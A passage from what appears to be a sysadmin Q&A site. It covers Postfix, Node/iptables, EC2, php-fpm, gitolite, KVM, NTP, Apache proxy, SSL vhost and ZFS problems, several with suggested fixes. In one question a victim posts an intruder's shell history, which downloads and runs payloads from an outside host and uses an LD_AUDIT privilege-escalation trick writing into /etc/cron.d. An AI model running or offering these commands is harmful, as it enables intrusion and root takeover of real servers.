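    Two things in the output above are worth chasing; a sketch of checks (the interpretations that follow are assumptions):

        # does the MX resolve, and is port 25 reachable from outside?
        dig +short MX domain.com
        telnet mail.domain.com 25        # run from an external host, not the server
        # watch an inbound delivery attempt live
        tail -f /var/log/maillog

    First, connect from unknown[unknown] followed by "lost connection after CONNECT" means smtpd never even learned the peer's address, which smells like a broken NAT/port-forward or an ISP intercepting port 25 rather than a Postfix misconfiguration. Second, postconf -n reports mynetworks = 168.100.189.0/28, not the 192.168.0.0/24 added to main.cf, so the file that was edited may not be the one Postfix is reading; compare config_directory = /etc/postfix against where the change was made.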


  • Node.js server not responding outside localhost on CentOS

    - by David Martinez
    I'm running a basic Express server on CentOS, but for some reason it is not responding outside of localhost. I have tried everything I found on Google, but nothing works so far. This is my Express listen call:

        app.listen(3000, "0.0.0.0");

    If I run curl http://localhost:3000/ on the server, it works fine. If I curl the server's IP, it doesn't work. I already changed my iptables:

        num  target  prot opt source     destination
        1    ACCEPT  tcp  --  0.0.0.0/0  0.0.0.0/0   tcp dpt:80
        2    ACCEPT  tcp  --  0.0.0.0/0  0.0.0.0/0   tcp dpt:80
        3    ACCEPT  tcp  --  0.0.0.0/0  0.0.0.0/0   tcp dpt:3000

    There is currently an Apache server running on port 80 with no problems. I also tried setting up a virtual host in Apache, but that didn't work either:

        <VirtualHost *:80>
            ServerName SubDOmain.MyDomain.com
            ProxyRequests off
            <Proxy *>
                Order allow,deny
                Allow from all
            </Proxy>
            ProxyPass / http://localhost:3000/
            ProxyPassReverse / http://localhost:3000/
            ProxyPreserveHost on
        </VirtualHost>

    There is another virtual host working fine that redirects to another DocumentRoot. I'm running Node as root for testing purposes, but the Node application's owner is another user. All folders have 705 and all files 664.

    Edit: I stopped Apache and ran my Node app on port 80, and it worked fine; I could access the Node app from my IP and domain.
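
    The edit narrows this to filtering on port 3000 rather than to Node or Apache. A sketch of checks and a likely fix, assuming the stock CentOS firewall, whose INPUT chain ends in a catch-all REJECT:

        # confirm node is listening on all interfaces
        netstat -tlnp | grep :3000
        # show the whole chain; the listing in the question may cut off after rule 3
        iptables -L INPUT -n --line-numbers
        # if the dpt:3000 ACCEPT sits below a REJECT rule, re-insert it at the top
        iptables -D INPUT -p tcp --dport 3000 -j ACCEPT
        iptables -I INPUT 1 -p tcp --dport 3000 -j ACCEPT
        service iptables save

    Rules are evaluated top-down, so an ACCEPT appended with -A after the catch-all REJECT never matches, which would produce exactly this "works locally, filtered remotely" behaviour.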


  • Amazon EC2 instance missing Network Interface

    - by Sergiks
    I am running Linux on a t1.micro instance at Amazon EC2. After noticing brute-force SSH login attempts from a certain IP, and after a little Googling, I issued the two following commands (the IP below is not the real one):

        iptables -A INPUT -s 202.54.20.22 -j DROP
        iptables -A OUTPUT -d 202.54.20.22 -j DROP

    Either this, or maybe some other action such as a yum upgrade, caused the following fiasco: after rebooting, the server came up without its network interface! I can only connect to it through the AWS Management Console's Java SSH client, via the local 10.x.x.x address. The console's "Attach Network Interface" and "Detach..." actions are greyed out for this instance, and the Network Interfaces item on the left does not offer any subnets to choose from when creating a new interface. Please advise: how can I recreate a network interface for the instance?

    Update: the instance is not accessible from outside; it cannot be pinged, SSH'ed into, or reached over HTTP on port 80. Here's the ifconfig output:

        eth0      Link encap:Ethernet HWaddr 12:31:39:0A:5E:06
                  inet addr:10.211.93.240 Bcast:10.211.93.255 Mask:255.255.255.0
                  inet6 addr: fe80::1031:39ff:fe0a:5e06/64 Scope:Link
                  UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
                  RX packets:1426 errors:0 dropped:0 overruns:0 frame:0
                  TX packets:1371 errors:0 dropped:0 overruns:0 carrier:0
                  collisions:0 txqueuelen:1000
                  RX bytes:152085 (148.5 KiB) TX bytes:208852 (203.9 KiB)
                  Interrupt:25

        lo        Link encap:Local Loopback
                  inet addr:127.0.0.1 Mask:255.0.0.0
                  inet6 addr: ::1/128 Scope:Host
                  UP LOOPBACK RUNNING MTU:16436 Metric:1
                  RX packets:0 errors:0 dropped:0 overruns:0 frame:0
                  TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
                  collisions:0 txqueuelen:0
                  RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

    What is also unusual: a new micro instance I created from scratch, with no relation to the troubled one, was not pingable either.
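
    A couple of observations that may reframe the problem (assumptions, but consistent with the ifconfig shown): eth0 carrying only a 10.x address is normal on EC2, since the public address is NAT-mapped and never appears inside the instance, and "Attach Network Interface" being greyed out is expected outside a VPC. So the interface is probably fine and the block is in the firewall or addressing layer. A sketch of checks:

        # inside the instance: is the saved iptables state blocking more than intended?
        iptables -L -n
        iptables -F          # flush as a test, then re-add the two DROP rules
        # from a machine with the EC2 API tools: is a public/elastic IP still mapped,
        # and does the security group allow 22, 80 and ICMP? (i-xxxxxxxx is a placeholder)
        ec2-describe-instances i-xxxxxxxx
        ec2-describe-group

    The fresh micro instance not answering ping fits a security group with no ICMP rule, which is the EC2 default.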


  • Nginx + php-fpm - recv() error

    - by Ilya Biryukov
    I get the following error in the nginx log:

        [error] 17734#0: *6643 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: [cut], server: [cut], request: "GET /venues HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "[cut]"

    I have a dedicated box with 8 GB RAM and a quad-core chip; a good server. nginx, php-fpm and MySQL are all the latest versions, running under Ubuntu 10.04. I only get this when I stress-test the server with siege. If I increase the number of concurrent connections to 100, up to 20% of all requests fail. Furthermore, I don't get this on pages that have no MySQL queries, and I see only a few failures on pages with a moderate number of queries, though I'm not sure whether that has anything to do with it. I have a feeling this is something to do with PHP, but I can't figure it out. Any suggestions of where to even start looking?

    Update: the PHP error log is silent; no record of anything going wrong.
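
    recv() 104 from the fastcgi upstream means the php-fpm worker closed the connection mid-request, typically because a child crashed, was OOM-killed, or the pool ran out of workers under load; the silence of PHP's own error log fits, because those events land in php-fpm's log instead. A sketch of where to look, with assumed paths and values:

        # php-fpm's own log, separate from PHP's error log (path is an assumption)
        tail -f /var/log/php5-fpm.log
        # OOM kills show up in the kernel log
        dmesg | grep -i kill

        ; pool config knobs worth checking (values are assumptions)
        pm = dynamic
        pm.max_children = 50          ; raise if the log says max_children was reached
        catch_workers_output = yes    ; surface worker stderr instead of losing it

    If the log shows children "exited on signal 11", the next step is isolating the crashing extension; given the stack listed, running a test without xcache is one cheap process of elimination.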


  • Correct file permissions for Trac and the git user to access gitolite repositories

    - by klemens
    Hi, this may sound like a stupid question (to me), but I couldn't find any info. On my server I host some Git repositories via gitolite, and I have a Trac instance for every repository. I have a user called git for pushing/pulling from the server (git clone git@server:repo), and Trac runs in an Apache vhost with mod_wsgi, under the www-data user.

    So what riddles me (maybe because I don't have much of a clue about file permissions at all) is: what's the best permission setup (chown, chmod) for the Git repositories (/home/git/repositories/...)? www-data (or Trac) needs at least read permission, I think, and git (or gitolite) obviously needs read/write permission to push changesets. I tried a few things (i.e. adding www-data and/or git to the www-data/git groups) but didn't get it right; at least one of the two (Git or Trac) stops working. Any suggestions are highly appreciated. Regards, klemens
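
    A sketch of a group-read setup that usually covers this split (gitolite keeps write access, Trac only reads; the umask option name assumes a gitolite v2-era install):

        # let the web server read the repositories via the git group
        usermod -a -G git www-data
        chmod g+rx /home/git                     # home dirs often block group traversal
        chmod -R g+rX /home/git/repositories
        # make gitolite create future objects group-readable:
        # in /home/git/.gitolite.rc set
        #   $REPO_UMASK = 0027;

    Ownership stays git:git throughout, so pushes keep working; www-data gets read-only access through group membership, which is all Trac's repository browser needs. Remember to restart Apache after the usermod so the new group membership takes effect.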


  • Is this "cache administrator" error my server's problem?

    - by Eoin
    Hey, I have a CentOS VPS running Apache with a phpBB installation. One specific user has received errors when posting a message or logging in to the forum. The issue has arisen in parallel with installing nginx, which serves only the static files of my site; I'm not sure if that is just coincidence. Furthermore, my setup uses redirects (in some cases double redirects) to point the user to a different virtual folder: the forum is seen to be at /translation/ but the actual files are in /phpbb/. I'm at a loss as to what the underlying issue may be. My server? The person's ISP? She has tested both at home and at work, with similar issues. The error she receives:

        While trying to process the request:

        GET /phpbb/index.php?sid=f62c927e7eb8f1d60a92dcc6fd918112 HTTP/1.1
        Host: www.irishgaelictranslator.com
        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-za
        Accept-Encoding: gzip,deflate
        Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
        Keep-Alive: 115
        Connection: keep-alive
        Referer: http://www.irishgaelictranslator.com/phpbb/ucp.php?mode=login
        Cookie: phpbb3_cipi4_u=96645; phpbb3_cipi4_k=; phpbb3_cipi4_sid=f62c927e7eb8f1d60a92dcc6fd918112; __utma=153470688.1232378553.1294664234.1294664234.1294664234.1; __utmb=153470688.9.10.1294664234; __utmc=153470688; __utmz=153470688.1294664235.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); style_cookie=null

        The following error was encountered:

        Invalid Response

        The HTTP Response message received from the contacted server could not be understood or was otherwise malformed. Please contact the site operator. Your cache administrator may be able to provide you with more details about the exact nature of the problem if needed.


  • CentOS 6.3 KVM: forwarding external IPs to guests

    - by user1111702
    I have a CentOS 6.3 server with KVM installed. The server has one NIC and four external IPs:

        176.9.xxx.xx1
        176.9.xxx.xx2
        176.9.xxx.xx3
        176.9.xxx.xx4

    I use the following configuration, with ifcfg-eth0 as a slave to ifcfg-br0. The configuration in ifcfg-eth0 is:

        DEVICE=eth0
        ONBOOT=yes
        BRIDGE=br0
        HWADDR=14:da:e9:b3:8b:99

    and in ifcfg-br0:

        DEVICE=br0
        TYPE=Bridge
        BOOTPROTO=static
        BROADCAST=176.9.xxx.xxx
        IPADDR=176.9.xxx.xx1
        NETMASK=255.255.255.0
        SCOPE="peer 176.9.xxx.xxx"

    I also have three aliases of br0 to receive the traffic from the other external IPs. br0:1 for the second external IP:

        DEVICE=br0:1
        IPADDR=176.9.xxx.xx2
        NETMASK=255.255.255.248
        ONBOOT=yes

    br0:2 for the third external IP:

        DEVICE=br0:2
        IPADDR=176.9.xxx.xx3
        NETMASK=255.255.255.248
        ONBOOT=yes

    and br0:3 for the fourth external IP:

        DEVICE=br0:3
        IPADDR=176.9.xxx.xx4
        NETMASK=255.255.255.248
        ONBOOT=yes

    The above settings work fine and I receive the traffic from all the external IPs. My problem is that I want to pass the traffic from each external IP to a specific virtual guest on the server, i.e. traffic arriving at 176.9.xxx.xx2 must go to virtual machine 1, 176.9.xxx.xx3 to virtual machine 2, and 176.9.xxx.xx4 to virtual machine 3. Can you please help me achieve this? What are the settings on the host, and what should I do in the guests? Thank you in advance.
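
    A sketch of one approach that keeps the host's alias setup intact: leave the guests on libvirt's default NAT network and DNAT each public address to its guest (the 192.168.122.x addresses after the arrows are assumptions):

        # enable forwarding on the host
        sysctl -w net.ipv4.ip_forward=1
        # one DNAT per public IP -> guest, plus matching SNAT on the way out
        iptables -t nat -A PREROUTING  -d 176.9.xxx.xx2 -j DNAT --to-destination 192.168.122.11
        iptables -t nat -A PREROUTING  -d 176.9.xxx.xx3 -j DNAT --to-destination 192.168.122.12
        iptables -t nat -A PREROUTING  -d 176.9.xxx.xx4 -j DNAT --to-destination 192.168.122.13
        iptables -t nat -A POSTROUTING -s 192.168.122.11 -j SNAT --to-source 176.9.xxx.xx2
        iptables -t nat -A POSTROUTING -s 192.168.122.12 -j SNAT --to-source 176.9.xxx.xx3
        iptables -t nat -A POSTROUTING -s 192.168.122.13 -j SNAT --to-source 176.9.xxx.xx4
        service iptables save

    The alternative is to give each guest its public IP directly on br0, but with a peer/pointopoint uplink like the SCOPE line above (common with hosted dedicated servers) the provider often filters unknown MAC addresses, so the routed/DNAT variant is the safer first try; that filtering is an assumption about the hosting setup.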


  • When should NTPd broadcast/broadcastclient be used instead of client/server or peer modes?

    - by Luke404
    The NTP daemon is often used in its simplest mode, client/server: you specify one or more server directives in your ntp.conf and your clients will use those servers. In addition, when you run your own NTP servers it is good practice to peer them together, so that if one of them loses connectivity to its upstream servers it will get time from its peers. But NTPd can also work with broadcast and/or multicast distribution of time data, with the documentation stating:

        broadcast and multicast modes are intended for configurations involving one or a few servers and a possibly very large client population

    The documentation also says elsewhere:

        It is possible and frequently useful to configure a host as both broadcast client and broadcast server. A number of hosts configured this way and sharing a common broadcast address will automatically organize themselves in an optimum configuration based on stratum and synchronization distance.

    I can see one obvious administrative benefit: you don't have to manually specify and update the list of NTP servers in the clients' ntp.conf, so it looks tempting to use broadcast mode even for a small client population (say 5+ clients with 3-4 servers). I expect network traffic to be a little higher with broadcasts than with client/server associations, but given the usual gigabit Ethernet LAN the impact should be negligible unless you have a very large number of hosts in the same broadcast domain. At the end of the day, when should broadcast mode be used or avoided? Are there pros and cons I haven't seen?
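
    For reference, the two modes side by side; a minimal sketch of ntp.conf fragments, assuming a 192.168.1.0/24 LAN and symmetric-key authentication (broadcast mode should normally be authenticated):

        # --- server, broadcast mode ---
        server 0.pool.ntp.org iburst
        broadcast 192.168.1.255 key 1
        keys /etc/ntp/keys
        trustedkey 1

        # --- client, broadcast mode ---
        broadcastclient
        keys /etc/ntp/keys
        trustedkey 1

        # --- client, classic client/server mode, for comparison ---
        server ntp1.example.lan iburst
        server ntp2.example.lan iburst

    One trade-off visible even at this size: broadcast clients still exchange a few unicast packets with the server at startup to calibrate the network delay, so the "zero client configuration" benefit is about maintenance effort, not about traffic patterns.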


  • Setup proxy with Apache 2.4 on Mac 10.8

    - by Aptos
    I have one application (Java) running on my local machine (localhost:9000). I want to set up Apache as a front-end proxy, so I used the following configuration in httpd.conf:

        <Directory />
            #Options FollowSymLinks
            Options Indexes FollowSymLinks Includes ExecCGI
            AllowOverride All
            Order deny,allow
            Allow from all
        </Directory>

        Listen 57173

        LoadModule proxy_module modules/mod_proxy.so

        <VirtualHost *:9999>
            ProxyPreserveHost On
            ServerName project.play
            ProxyPass / http://127.0.0.1:9000/Login
            ProxyPassReverse / http://127.0.0.1:9000/Login
            LogLevel debug
        </VirtualHost>

        ServerName localhost:57173

    I changed /private/etc/hosts to:

        ##
        # Host Database
        #
        # localhost is used to configure the loopback interface
        # when the system is booting. Do not change this entry.
        ##
        127.0.0.1       localhost
        255.255.255.255 broadcasthost
        ::1             localhost
        fe80::1%lo0     localhost
        127.0.0.1:9999  project.play

    and ran dscacheutil -flushcache. The problem is that I can only access localhost:57173; when I try http://project.play:9999, Chrome returns "Oops! Google Chrome could not find project.play:9999". Can somebody show me where I went wrong? Thank you very much.

    P/S: When accessing localhost:9999 it returns "The server made a boo boo."
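
    Two things stand out (general facts about Apache and /etc/hosts rather than guesses about this particular app): hosts entries map names to addresses only and cannot carry a port, so the line 127.0.0.1:9999 project.play is ignored, which is exactly why the name does not resolve; and nothing tells Apache to listen on 9999, since the only Listen directive is for 57173. A sketch of the corrected pieces:

        # /private/etc/hosts
        127.0.0.1    project.play

        # httpd.conf
        Listen 9999
        LoadModule proxy_module      modules/mod_proxy.so
        LoadModule proxy_http_module modules/mod_proxy_http.so

        <VirtualHost *:9999>
            ServerName project.play
            ProxyPreserveHost On
            ProxyPass        / http://127.0.0.1:9000/
            ProxyPassReverse / http://127.0.0.1:9000/
        </VirtualHost>

    mod_proxy_http is required for http:// backends and is not loaded in the config shown. Mapping / to /Login also prefixes every proxied path with /Login; proxying to the application root (as above) is usually what's wanted, though that part is an assumption about the Play app's routes.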


  • Ubuntu Server hack

    - by haxpanel
    Hi! I looked at netstat and noticed that someone besides me is connected to the server by SSH. I looked into this because my user has the only SSH access. I found this in an FTP user's .bash_history file:

        w
        uname -a
        ls -a
        sudo su
        wget qiss.ucoz.de/2010/.jpg
        wget qiss.ucoz.de/2010.jpg
        tar xzvf 2010.jpg
        rm -rf 2010.jpg
        cd 2010/
        ls -a
        ./2010
        ./2010x64
        ./2.6.31
        uname -a
        ls -a
        ./2.6.37-rc2
        python rh2010.py
        cd ..
        ls -a
        rm -rf 2010/
        ls -a
        wget qiss.ucoz.de/ubuntu2010_2.jpg
        tar xzvf ubuntu2010_2.jpg
        rm -rf ubuntu2010_2.jpg
        ./ubuntu2010-2
        ./ubuntu2010-2
        ./ubuntu2010-2
        cat /etc/issue
        umask 0
        dpkg -S /lib/libpcprofile.so
        ls -l /lib/libpcprofile.so
        LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
        ping
        gcc
        touch a.sh
        nano a.sh
        vi a.sh
        vim
        wget qiss.ucoz.de/ubuntu10.sh
        sh ubuntu10.sh
        nano ubuntu10.sh
        ls -a
        rm -rf ubuntu10.sh
        . .. a.sh .cache ubuntu10.sh ubuntu2010-2
        ls -a
        wget qiss.ucoz.de/ubuntu10.sh
        sh ubuntu10.sh
        ls -a
        rm -rf ubuntu10.sh
        wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
        rm -rf W2Ksp3.exe
        passwd

    The system is in a jail; does that matter in the current case? What should I do? Thanks, everyone! What I have done so far:

        - banned the connected SSH host with iptables
        - stopped the sshd in the jail
        - saved: .bash_history, syslog, dmesg, and the files fetched in the history's wget lines


  • Prevent SSL certificate being returned for a specific domain

    - by jezmck
    Apologies for a long question: we've taken on a new client whose web hosting was previously on their in-house server, which still hosts their Exchange/Outlook email. We now host their domain (and many others) on our server. They're complaining that they're getting errors in Outlook. I don't understand the AutoDiscover stuff at the root of the problem, but I believe I just need to stop the SSL certificate on our server being returned when requested for a particular domain:

        Yes it is, the issue lies with "{newclient}.com" being pointed to your server IP and that server
        having port 443 open with an SSL certificate associated to it. So when Outlook/ActiveSync use
        autodiscover to find the mailbox settings they find your SSL (because 443 is open) and flag it as
        an error. The solution is to close 443 so it's not discovered; Autodiscover will then proceed to
        mail.{newclient}.com via the MX / service records and discover the correct SSL.

    I'm new here and there was no hand-over, so I don't know whether other currently hosted sites need to accept SSL connections, though I suspect some will, or may in future. This is a live server, so I can't risk trying loads of options in case I take the server offline! I feel like I should be adding something like the following to vhosts.conf:

        <VirtualHost *:443>
            ServerName {newclient}.com
            ServerAlias www.{newclient}.com
            SSLEngine Off
            SSLCertificateFile {NONE}
            SSLCertificateKeyFile {NONE}
        </VirtualHost>

    Apologies for the fact that I don't know enough about this subject to be able to ask the question more clearly!


  • RAID-Z inaccessible after putting one disk offline

    - by varesa
    I have installed FreeNAS on a test server with 3x 1 TB drives, set up in raidz. I tried to offline one of the disks (from the FreeNAS web UI), and the array became degraded, as I think it should. The problem is the array becoming inaccessible after that; I thought a RAID like this should be able to run fine with one of the disks missing. Very soon after I offlined and pulled out the disk, the iSCSI share disappeared from an ESXi host's datastores. I also SSH'ed into the FreeNAS server and tried just executing ls /mnt/raid (/mnt/raid being the mount point). The whole terminal froze, not accepting ^C or anything.

        # zpool status -v
          pool: raid
         state: DEGRADED
        status: One or more devices are faulted in response to IO failures.
        action: Make sure the affected devices are connected, then run 'zpool clear'.
           see: http://www.sun.com/msg/ZFS-8000-HC
         scrub: none requested
        config:

            NAME                                            STATE     READ WRITE CKSUM
            raid                                            DEGRADED     1    30     0
              raidz1                                        DEGRADED     4    56     0
                gptid/c8c9e44c-08e1-11e2-9ba6-001b212a83ea  ONLINE       3    60     0
                gptid/c96f32d5-08e1-11e2-9ba6-001b212a83ea  ONLINE       3    63     0
                gptid/ca208205-08e1-11e2-9ba6-001b212a83ea  OFFLINE      0     0     0

        errors: Permanent errors have been detected in the following files:

            /mnt/raid/
            raid/iscsivol:<0x0>
            raid/iscsivol:<0x1>

    Have I misunderstood how raidz works, or is there something else going on? It would not be nice to have the same thing happen on a production system...

